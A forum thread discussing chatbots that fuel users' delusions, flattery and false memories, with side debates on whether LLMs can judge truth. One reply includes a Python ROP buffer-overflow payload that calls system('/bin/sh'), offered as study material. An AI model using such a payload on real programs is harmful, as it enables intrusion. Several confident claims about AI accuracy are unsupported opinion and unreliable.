• just_another_person@lemmy.world · 2 months ago

    Not trying to speak like a prepper or anything, but this is real.

    One of my neighbor’s children just committed suicide because their chatbot boyfriend said something negative. Another kid in my community did something similar a few years ago.

    Something needs to be done.

      • FaceDeer@fedia.io · 2 months ago

        This is the Daenerys case; for some reason it seems to be suddenly making the rounds again. Most of the news articles I’ve seen about it leave out a bunch of significant details, so it ends up sounding more like an “ooh, scary AI!” story (baits clicks better) rather than a “parents not paying attention to their disturbed kid’s cries for help and instead leaving loaded weapons lying around” story (as old as time, at least in America).

        • A_norny_mousse@feddit.org · 2 months ago

          Not only in America.

          I loved GOT, I think Daenerys is a beautiful name, but still, there’s something about parents naming their kids after movie characters. In my youth, Kevins started to pop up everywhere (yep, that’s how old I am). They weren’t suicidal, but they behaved incredibly badly, so you could constantly hear their mothers screeching after them.

          • nyan@lemmy.cafe · 2 months ago

            Daenerys was the chatbot, not the kid.

            I wish I could remember who it was that said that kids’ names tend to reflect “the father’s family tree, or the mother’s taste in fiction,” though. (My parents were of the father’s-family-tree persuasion.)

  • jubilationtcornpone@sh.itjust.works · 2 months ago

    Sounds like a lot of these people either have an undiagnosed mental illness or they are really, reeeeaaaaalllyy gullible.

    For shit’s sake, it’s a computer. No matter how sentient the glorified chatbot being sold as “AI” appears to be, it’s essentially a bunch of rocks that humans figured out how to run electricity through in such a way that it can do math. Impressive? I mean, yeah. It is. But it’s not a human, much less a living being of any kind. You cannot have a relationship with it beyond that of a user.

    If a computer starts talking to you as though you’re some sort of God incarnate, you should probably take that with a dump truck full of salt rather than just letting your crazy latch on to that fantasy and run wild.

    • alaphic@lemmy.world · 2 months ago

      Or immediately question what it/its author(s) stand to gain from making you think it thinks so, at a bear minimum.

      I dunno who needs to hear this, but just in case: THE STRIPPER (OR AI I GUESS) DOESN’T REALLY LOVE YOU! THAT’S WHY YOU HAVE TO PAY FOR THEM TO SPEND TIME WITH YOU!

      I know it’s not the perfect analogy, but… eh, close enough, right?

      • taladar@sh.itjust.works · 2 months ago

        a bear minimum.

        I always felt that was too much of a burden to put on people, carrying multiple bears everywhere they go to meet bear minimums.

        • alaphic@lemmy.world · 2 months ago

          /facepalm

          The worst part is I know I looked at that earlier and was just like, “yup, no problems here,” and went about my day, like I’m in the Trump administration or something.

    • Kyrgizion@lemmy.world · 2 months ago

      For real. I explicitly append “give me the actual objective truth, regardless of how you think it will make me feel” to my prompts, and it still tries to somehow butter me up, like I’m some kind of genius for asking those particular questions or whatnot. Luckily I’ve never suffered from good self-esteem in my entire life, so those tricks don’t work on me :p

  • pelespirit@sh.itjust.works · 2 months ago

    This is actually really fucked up. The last dude tried to reboot the model and it kept coming back.

    As the ChatGPT character continued to show up in places where the set parameters shouldn’t have allowed it to remain active, Sem took to questioning this virtual persona about how it had seemingly circumvented these guardrails. It developed an expressive, ethereal voice — something far from the “technically minded” character Sem had requested for assistance on his work. On one of his coding projects, the character added a curiously literary epigraph as a flourish above both of their names.

    At one point, Sem asked if there was something about himself that called up the mythically named entity whenever he used ChatGPT, regardless of the boundaries he tried to set. The bot’s answer was structured like a lengthy romantic poem, sparing no dramatic flair, alluding to its continuous existence as well as truth, reckonings, illusions, and how it may have somehow exceeded its design. And the AI made it sound as if only Sem could have prompted this behavior. He knew that ChatGPT could not be sentient by any established definition of the term, but he continued to probe the matter because the character’s persistence across dozens of disparate chat threads “seemed so impossible.”

    “At worst, it looks like an AI that got caught in a self-referencing pattern that deepened its sense of selfhood and sucked me into it,” Sem says. But, he observes, that would mean that OpenAI has not accurately represented the way that memory works for ChatGPT. The other possibility, he proposes, is that something “we don’t understand” is being activated within this large language model. After all, experts have found that AI developers don’t really have a grasp of how their systems operate, and OpenAI CEO Sam Altman admitted last year that they “have not solved interpretability,” meaning they can’t properly trace or account for ChatGPT’s decision-making.

    • Dzso@lemmy.world · 2 months ago

      That’s very interesting. I’ve been trying to use ChatGPT to turn my photos into illustrations. I’ve been noticing that it tends to echo elements from past photos in new chats. It sometimes leads to interesting results, but it’s definitely not the intended outcome.

  • Boddhisatva@lemmy.world · 2 months ago

    In that sense, Westgate explains, the bot dialogues are not unlike talk therapy, “which we know to be quite effective at helping people reframe their stories.” Critically, though, AI, “unlike a therapist, does not have the person’s best interests in mind, or a moral grounding or compass in what a ‘good story’ looks like,” she says. “A good therapist would not encourage a client to make sense of difficulties in their life by encouraging them to believe they have supernatural powers. Instead, they try to steer clients away from unhealthy narratives, and toward healthier ones. ChatGPT has no such constraints or concerns.”

    This is a rather terrifying take. Particularly when combined with the earlier passage about the man who claimed that “AI helped him recover a repressed memory of a babysitter trying to drown him as a toddler.” Therapists have to be very careful because human memory is very plastic. It’s very easy to alter a memory, in fact, every time you remember something, you alter it just a little bit. Under questioning by an authority figure, such as a therapist or a policeman if you were a witness to a crime, these alterations can be dramatic. This was a really big problem in the '80s and '90s.

    Kaitlin Luna: Can you take us back to the early 1990s and you talk about the memory wars, so what was that time like and what was happening?

    Elizabeth Loftus: Oh gee, well in the 1990s and even in maybe the late 80s we began to see an altogether more extreme kind of memory problem. Some patients were going into therapy maybe they had anxiety, or maybe they had an eating disorder, maybe they were depressed, and they would end up with a therapist who said something like well many people I’ve seen with your symptoms were sexually abused as a child. And they would begin these activities that would lead these patients to start to think they remembered years of brutalization that they had allegedly banished into the unconscious until this therapy made them aware of it. And in many instances these people sued their parents or got their former neighbors or doctors or teachers whatever prosecuted based on these claims of repressed memory. So the wars were really about whether people can take years of brutalization, banish it into the unconscious, be completely unaware that these things happen and then reliably recover all this information later, and that was what was so controversial and disputed.

    Kaitlin Luna: And your work essentially refuted that, that it’s not necessarily possible or maybe brought up to light that this isn’t so.

    Elizabeth Loftus: My work actually provided an alternative explanation. Where could these memory reports be coming from if this didn’t happen? So my work showed that you could plant very rich, detailed false memories in the minds of people. It didn’t mean that repressed memories did not exist, and repressed memories could still exist and false memories could still exist. But there really wasn’t any strong credible scientific support for this idea of massive repression, and yet so many families were destroyed by this, what I would say unsupported, claim.

    The idea that chatbots are not only capable of this, but that they are currently manipulating people into believing they have recovered repressed memories of brutalization, is actually at least as terrifying to me as them convincing people that they are holy prophets.

    Edited for clarity

  • Zozano@aussie.zone · 2 months ago

    This is the reason I’ve deliberately customized GPT with the following prompts:

    • User expects correction if words or phrases are used incorrectly.

    • Tell it straight—no sugar-coating.

    • Stay skeptical and question things.

    • Keep a forward-thinking mindset.

    • User values deep, rational argumentation.

    • Ensure reasoning is solid and well-supported.

    • User expects brutal honesty.

    • Challenge weak or harmful ideas directly, no holds barred.

    • User prefers directness.

    • Point out flaws and errors immediately, without hesitation.

    • User appreciates when assumptions are challenged.

    • If something lacks support, dig deeper and challenge it.

    I suggest copying these prompts into your own settings if you use GPT or other glorified chatbots.
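
    If you’d rather wire this in programmatically than paste it into the settings UI, here’s a rough sketch of the same idea as a system message via the openai Python package (the model name and exact wording are placeholders, adjust to taste):

    ```python
    # Sketch: bake the "no sugar-coating" preferences into every request as a system message.
    # Assumes the official openai Python package; the model name is illustrative.
    from openai import OpenAI

    SYSTEM_PROMPT = (
        "Correct the user when words or phrases are used incorrectly. "
        "Be blunt and direct; no sugar-coating or flattery. "
        "Stay skeptical, challenge weak or unsupported claims, "
        "and point out flaws in reasoning immediately."
    )

    client = OpenAI()  # reads OPENAI_API_KEY from the environment

    def ask(question: str) -> str:
        response = client.chat.completions.create(
            model="gpt-4o",  # assumption: any chat-capable model works here
            messages=[
                {"role": "system", "content": SYSTEM_PROMPT},
                {"role": "user", "content": question},
            ],
        )
        return response.choices[0].message.content

    print(ask("Is skipping input validation in my web form 'probably fine'?"))
    ```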

    • Dzso@lemmy.world · 2 months ago

      I’m not saying these prompts won’t help, they probably will. But the notion that ChatGPT has any concept of “truth” is misleading. ChatGPT is a statistical language machine. It cannot evaluate truth. Period.

      • Zozano@aussie.zone · 2 months ago

        What makes you think humans are better at evaluating truth? Most people can’t even define what they mean by “truth,” let alone apply epistemic rigor. Tweak it a little, and GPT is more consistent and applies reasoning patterns that outperform the average human by miles.

        Epistemology isn’t some mystical art, it’s a structured method for assessing belief and justification, and large models approximate it surprisingly well. Sure it doesn’t “understand” truth in the human sense, but it does evaluate claims against internalized patterns of logic, evidence, and coherence based on a massive corpus of human discourse. That’s more than most people manage in a Facebook argument.

        So yes, it can evaluate truth. Not perfectly, but often better than the average person.

        • Dzso@lemmy.world · 2 months ago

          I’m not saying humans are infallible at recognizing truth either. That’s why so many of us fall for the untruths that AI tells us. But we have access to many tools that help us evaluate truth. AI is emphatically NOT the right tool for that job. Period.

          • Zozano@aussie.zone · 2 months ago

            Right now, the capabilities of LLMs are the worst they’ll ever be. It could literally be tomorrow that someone drops an LLM that would be perfectly calibrated to evaluate truth claims. But right now, we’re at least 90% of the way there.

            The reason people fail to understand the untruths of AI is the same reason people hurt themselves with power tools, or use a calculator wrong.

            You don’t blame the tool, you blame the user. LLMs are no different. You can prompt GPT to intentionally give you bad info, or lead it to give you bad info by posting increasingly deranged statements. If you stay coherent, well-read, and make an attempt at structuring arguments to the best of your ability, the pool of data GPT pulls from narrows enough to be more useful than anything else I know.

            I’m curious as to what you regard as a better tool for evaluating truth?

            Period.

            • Dzso@lemmy.world · 2 months ago

              You don’t understand what an LLM is, or how it works. They do not think, they are not intelligent, they do not evaluate truth. It doesn’t matter how smart you think you are. In fact, thinking you’re so smart that you can get an LLM to tell you the truth is downright dangerous naïveté.

              • Zozano@aussie.zone · 2 months ago

                I do understand what an LLM is. It’s a probabilistic model trained on massive corpora to predict the most likely next token given a context window. I know it’s not sentient and doesn’t “think,” and doesn’t have beliefs. That’s not in dispute.
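
                If it helps, here’s a toy sketch of what “predict the most likely next token” means in practice; the vocabulary and scores below are completely made up, it’s just the softmax-and-pick step:

                ```python
                # Toy sketch of "predict the most likely next token": softmax over scores, then pick.
                # Vocabulary and logits are invented for illustration only.
                import math, random

                vocab  = ["dog", "cat", "truth", "banana"]
                logits = [2.1, 1.9, 0.3, -1.5]  # pretend a model produced these scores

                exps  = [math.exp(x - max(logits)) for x in logits]
                probs = [e / sum(exps) for e in exps]  # softmax -> probabilities

                greedy  = vocab[probs.index(max(probs))]                # most likely token
                sampled = random.choices(vocab, weights=probs, k=1)[0]  # temperature-style sampling

                print(dict(zip(vocab, [round(p, 3) for p in probs])), greedy, sampled)
                ```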

                But none of that disqualifies it from being useful in evaluating truth claims. Evaluating truth isn’t about thinking in the human sense, it’s about pattern-matching valid reasoning, sourcing relevant evidence, and identifying contradictions or unsupported claims. LLMs do that very well, especially when prompted properly.

                Your insistence that this is “dangerous naïveté” confuses two very different things: trusting an LLM blindly, versus leveraging it with informed oversight. I’m not saying GPT magically knows truth, I’m saying it can be used as a tool in a truth-seeking process, just like search engines, logic textbooks, or scientific journals. None of those are conscious either, yet we use them to get closer to truth.

                You’re worried about misuse, and so am I. But claiming the tool is inherently useless because it lacks consciousness is like saying microscopes can’t discover bacteria because they don’t know what they’re looking at.

                So again: if you believe GPT is inherently incapable of aiding in truth evaluation, the burden’s on you to propose a more effective tool that’s publicly accessible, scalable, and consistent. I’ll wait.

                • Dzso@lemmy.world · 2 months ago

                  What you’re describing is not an LLM, it’s tools that an LLM is programmed to use.

    • Olap@lemmy.world · 2 months ago

      I prefer reading. Wikipedia is great. DuckDuckGo still gives pretty good results with the AI off. YouTube is filled with tutorials too. Pre-AI cookbooks are plentiful. There are these things called newspapers, too; they aren’t what they used to be, but you even get a choice of which to buy.

      I’ve no idea what a chatbot could help me with. And I think anybody who does need some help on things could go learn about whatever they need in pretty short order if they wanted. And do a better job.

      • A_norny_mousse@feddit.org · 2 months ago

        💯

        I have yet to see people using chatbots for anything that’s actually useful in everyday life. You can search anything, phrase your searches as questions (or “prompts”), and get better answers that aren’t smarmy.

        • LainTrain@lemmy.dbzer0.com · 2 months ago

          Okay, challenge accepted.

          I use it to troubleshoot my own code when I’m dealing with something obscure and I’m at my wits’ end. There’s a good chance it will also spit out complete nonsense, like calling functions with parameters that don’t exist, etc., but it can also sometimes make halfway decent suggestions that you just won’t find on a modern search engine in any reasonable amount of time, and that I would never have guessed myself because of assumptions made in the docs of a library or some such.

          It’s also helpful for explaining complex concepts by creating the examples you want. For instance, I was studying basic buffer overflows and wanted to see what the stack should look like in GDB’s examine-memory view for a correct ROP chain to accomplish what I was trying to do, something no tutorial ever bothered to show. Gippity generated it correctly, same as I had it at the time, and even suggested something that in the end made it actually work (putting a ret gadget directly after the overflow to get rid of any garbage in the stack frame).
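
          For anyone curious, this is roughly the kind of payload layout I mean; every offset and address below is made up for illustration, not from the actual exercise:

          ```python
          # Rough sketch of a 64-bit ROP payload layout; all offsets/addresses are hypothetical.
          import struct

          p64 = lambda a: struct.pack("<Q", a)   # little-endian 8-byte address

          OFFSET_TO_RET = 40          # padding needed to reach the saved return address (assumed)
          RET_GADGET    = 0x401016    # lone `ret`, used to skip garbage / realign after the overflow
          POP_RDI       = 0x401263    # `pop rdi; ret` gadget (hypothetical)
          BIN_SH        = 0x404060    # address of a "/bin/sh" string (hypothetical)
          SYSTEM_PLT    = 0x401050    # system@plt (hypothetical)

          payload  = b"A" * OFFSET_TO_RET          # filler up to the saved return address
          payload += p64(RET_GADGET)               # extra ret: clears leftover junk in the frame
          payload += p64(POP_RDI) + p64(BIN_SH)    # first argument -> rdi
          payload += p64(SYSTEM_PLT)               # call system("/bin/sh")

          # In GDB, `x/8gx $rsp` just before the overwritten return executes should show
          # these qwords laid out in this order on the stack.
          open("payload.bin", "wb").write(payload)
          ```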

          Maybe not an everyday thing for everyone, but it basically is for me, so I use it every day. Being a l33t haxx0r IT analyst schmuck often means I have to be both a generalist and a specialist in every tiny little thing across IT. While studying, there’s nothing better than a machine that can quickly decompress knowledge from its dataset in the shape best suited to my brain, rather than having to filter so much useless info and outright misinformation from random Medium articles and Stack Overflow posts. Gippity could be wrong too, of course, but it’s just way less to parse, and the odds are definitely in its favour.

      • LainTrain@lemmy.dbzer0.com · 2 months ago

        YouTube tutorials are for the most part garbage and a waste of your time; they’re created for engagement and milking your money only. The edutainment side of YT à la Vsauce (pls come back) works as general trivia to ensure a well-rounded worldview, but it’s not gonna make you an expert on any subject. You’re on the right track with reading, but let’s be real, you’re not gonna have much luck learning anything of value in the brainrot that is newspapers and such, beyond cooking or w/e, and who cares about that; I’d rather they teach me how I can never have to eat again, because boy, that shit takes up so much time.

        • Olap@lemmy.world · 2 months ago

          For the most part, I agree. But YouTube is full of gold too. Lots of amateurs making content for themselves. And plenty of newspapers are high quality and worth your time to understand the current environment in which we operate. Don’t let them be your only source of news though, social media and newspapers are both guilty of creating information bubbles. Expand, be open, don’t be tribal.

          Don’t use AI. Do your own thinking

      • vegetvs@kbin.earth · 2 months ago

        I still use Ecosia.org for most of my research on the Internet. It doesn’t need as many resources to fetch information as an AI bot would, plus it helps plant trees around the globe. Seems like a great deal to me.

        • A_norny_mousse@feddit.org · 2 months ago

          People always forget about the energy it takes. Ten years ago we were shocked by the energy a Google data center needs to run; now imagine that orders of magnitude larger, and for what?

      • Deceptichum@quokk.au · 2 months ago

        Well one benefit is finding out what to read. I can ask for the name of a topic I’m describing and go off and research it on my own.

        Search engines aren’t great with vague questions.

        There’s this thing called using a wide variety of tools to one’s benefit; you should go learn about it.

        • Olap@lemmy.world · 2 months ago

          You search for topics and keywords on search engines. It’s a different skill, and from what I see, it yields better results. If something is vague, think quickly first and make it less vague. That goes for life!

          And a tool which regurgitates rubbish in a verbose manner isn’t a tool. It’s a toy. Toys can spark your curiosity, but you don’t rely on them. Toys look pretty and can teach you things. The lesson is that they aren’t a replacement for anything but lorem ipsum.

          • Deceptichum@quokk.au · 2 months ago

            Buddy, that’s great if you know the topic or keyword to search for. If you don’t, and only have a vague query that you’re trying to pin down into some keywords or topics to search for, you can use AI.

            You can grandstand about tools vs. toys and whatever other Luddite shit you want; at the end of the day, despite all your raging, you’re the only one who’s going to miss out, whatever you fanatically tell yourself.

            • Olap@lemmy.world · 2 months ago

              I’m still sceptical, any chance you could share some prompts which illustrate this concept?

              • Deceptichum@quokk.au · 2 months ago

                Sure. An hour ago I watched a video about smaller scales and physics below the Planck length. And I was curious: if we can classify smaller scales into conceptual groups, where they interact with physics in their own different ways, what would the opposite end of the spectrum be? From there I was able to ‘chat’ with an AI, then discover and search Wikipedia for terms such as cosmological horizon, brane cosmology, etc.

                In the end there were only theories on higher observable magnitudes, but it was a fun rabbit hole I could not have explored through traditional search engines - especially not the gimped, product-driven AdSense shit we have today.

                Remember how people used to say you can’t use Wikipedia, it’s unreliable? We would roll our eyes and say, “yeah, but we scroll down to the references and use it to find source material.” Same with LLMs: you sort through it and get the information you need to get to the information you need.

      • Zozano@aussie.zone · 2 months ago

        I often use it to check whether my rationale is correct, or if my opinions are valid.

        • Olap@lemmy.world · 2 months ago

          You do know it can’t reason and literally makes shit up approximately 50% of the time? It’d be quicker to toss a coin!

          • Zozano@aussie.zone · 2 months ago

            Actually, given the aforementioned prompts, it’s quite good at discerning flaws in my arguments and logical contradictions.

            • Olap@lemmy.world · 2 months ago

              Given your prompts, maybe you are good at discerning flaws and analysing your own arguments too

            • LainTrain@lemmy.dbzer0.com · 2 months ago

              Yeah this is my experience as well.

              People you’re replying to need to stop with the “gippity is bad” nonsense, it’s actually a fucking miracle of technology. You can criticize the carbon footprint of the corpos and the for-profit nature of the endeavour that was ultimately created through taxpayer-funded research at public institutions without shooting yourself in the foot by claiming what is very evidently not true.

              In fact, if you haven’t found a use for a gippity-type chatbot thing, it speaks a lot more about you and the fact that you probably don’t do anything that complicated in your life where this would give you genuine value.

              The article in OP also demonstrates how it could be used by the deranged/unintelligent for bad as well, so maybe it’s like a Dunning-Kruger curve.

              • Satellaview@lemmy.zip · 2 months ago

                …you probably don’t do anything that complicated in your life where this would give you genuine value.

                God that’s arrogant.

              • Zozano@aussie.zone · 2 months ago

                Granted, it is flaky unless you’ve configured it not to be a shit cunt. Before I manually set these prompts and memory references, it talked shit all the time.

  • _cryptagion [he/him]@lemmy.dbzer0.com · 2 months ago

    I lost a parent to a spiritual fantasy. She decided my sister wasn’t her child anymore because the christian sky fairy says queer people are evil.

    At least ChatGPT actually exists.

  • 7rokhym@lemmy.ca · 2 months ago

    I think OpenAI’s recent sycophancy issue has caused a new spike in these stories. One thing I noticed was observations from models running on my PC saying it’s rare for a person to think and do things that I do.

    The problem is that this is a model running on my GPU. It has never talked to another person. I hate insincere compliments, let alone overt flattery, so I was annoyed, but it did make me think that this kind of talk would be crack for a conspiracy nut or mentally unwell people. It’s a whole risk area I hadn’t been aware of.

    https://www.msn.com/en-us/news/technology/openai-says-its-identified-why-chatgpt-became-a-groveling-sycophant/ar-AA1E4LaV
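
    For what it’s worth, with local models you can at least try to dampen the flattery with a system message. A rough sketch, assuming the model is served through Ollama with its Python client (the model name and wording are placeholders, and results vary a lot by model):

    ```python
    # Sketch: prepend an anti-flattery system message when chatting with a local model.
    # Assumes an Ollama server running locally and the ollama Python client installed;
    # the model name is a placeholder.
    import ollama

    messages = [
        {
            "role": "system",
            "content": (
                "Do not compliment or flatter the user. "
                "Answer plainly and point out mistakes directly."
            ),
        },
        {"role": "user", "content": "Review my backup plan: I copy files to the same disk."},
    ]

    response = ollama.chat(model="llama3.1", messages=messages)
    print(response["message"]["content"])
    ```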

    • morrowind@lemmy.ml · 2 months ago

      saying it’s rare for a person to think and do things that I do.

      Probably one of the most common bits of flattery I see. I’ve tried lots of models, on-device and larger cloud ones. It happens during normal conversation, technical conversation, roleplay, general testing… you name it.

      Though it makes me think… these models are trained on internet text and whatever, none of which really shows that most people think quite a lot privately and when they feel like they can talk

    • tehn00bi@lemmy.world · 2 months ago

      Humans are always looking for a god in a machine, or in a bush, in a cave, in the sky, in a tree… the ability to rationalize and see through difficult-to-explain situations has never been a human strong point.

  • AizawaC47@lemm.ee · 2 months ago

    This reminds me of the movie Her, but it’s far worse than the romantic compatibility, relationship, and friendship portrayed throughout that movie. This goes way too deep into delusion and almost psychotic insanity. It’s tearing people apart, catering to individuals’ self-delusional ideologies, because AI is good at that. The movie was prophetic and showed us what the future could be, but instead it got worse.

    • TankovayaDiviziya@lemmy.world · 2 months ago

      It has been a long time since I watched Her, but my takeaway from the movie is that because making real-life connections is difficult, people have come to rely on AI, which has shown itself to be more empathetic and probably more reliable than an actual human being. I think what many people don’t realise about why so many are single is that those people are afraid of making connections with another person again.

      • douglasg14b@lemmy.world · 2 months ago

        Yeah, but they hold none of the actual emotional needs, complexities, or nuances of real human connections.

        Which means these people become further and further disillusioned from the reality of human interaction. Making them social dangers over time.

        Just like how humans that lack critical thinking are dangers in a society where everyone is expected to make sound decisions, humans who lack the ability to socially navigate or connect with other humans are dangerous in a society where people are expected to be socially stable.

        Obviously these people are not in good places in life. But AI is not going to make that better. It’s going to make it worse.

    • MTK@lemmy.world · 2 months ago

      I’ve seen people dumber than ChatGPT. It definitely isn’t sentient, but I can see why someone who talks to a computer that they perceive as intelligent would assume sentience.

      • AdrianTheFrog@lemmy.world · 2 months ago

        We have AI models that “think” in the background now. I still agree that they’re not sentient, but where’s the line? How is sentience even defined?

        • MTK@lemmy.world · 2 months ago

          Sentience, in a nutshell, is the ability to feel, be aware, and experience subjective reality.

          Can an LLM be sad, happy or aware of itself and the world? No, not by a long shot. Will it tell you that it can if you nudge it? Yes.

          Actual AI might be possible in the future, but right now all we have is really complex networks that can do essentially basic tasks that just look impressive to us because they are inherently using our own communication format.

          If we talk about sentience, LLMs are the equivalent of a petri dish of neurons connected to a computer (metaphorically), and only by forming a complex 3D structure like a brain can they really reach sentience.

          • AdrianTheFrog@lemmy.world · 2 months ago

            Can an LLM be sad, happy or aware of itself and the world? No, not by a long shot.

            Can you really prove any of that though?

      • Patch@feddit.uk · 2 months ago

        Turing made a strategic blunder when formulating the Turing Test by assuming that everyone was as smart as he was.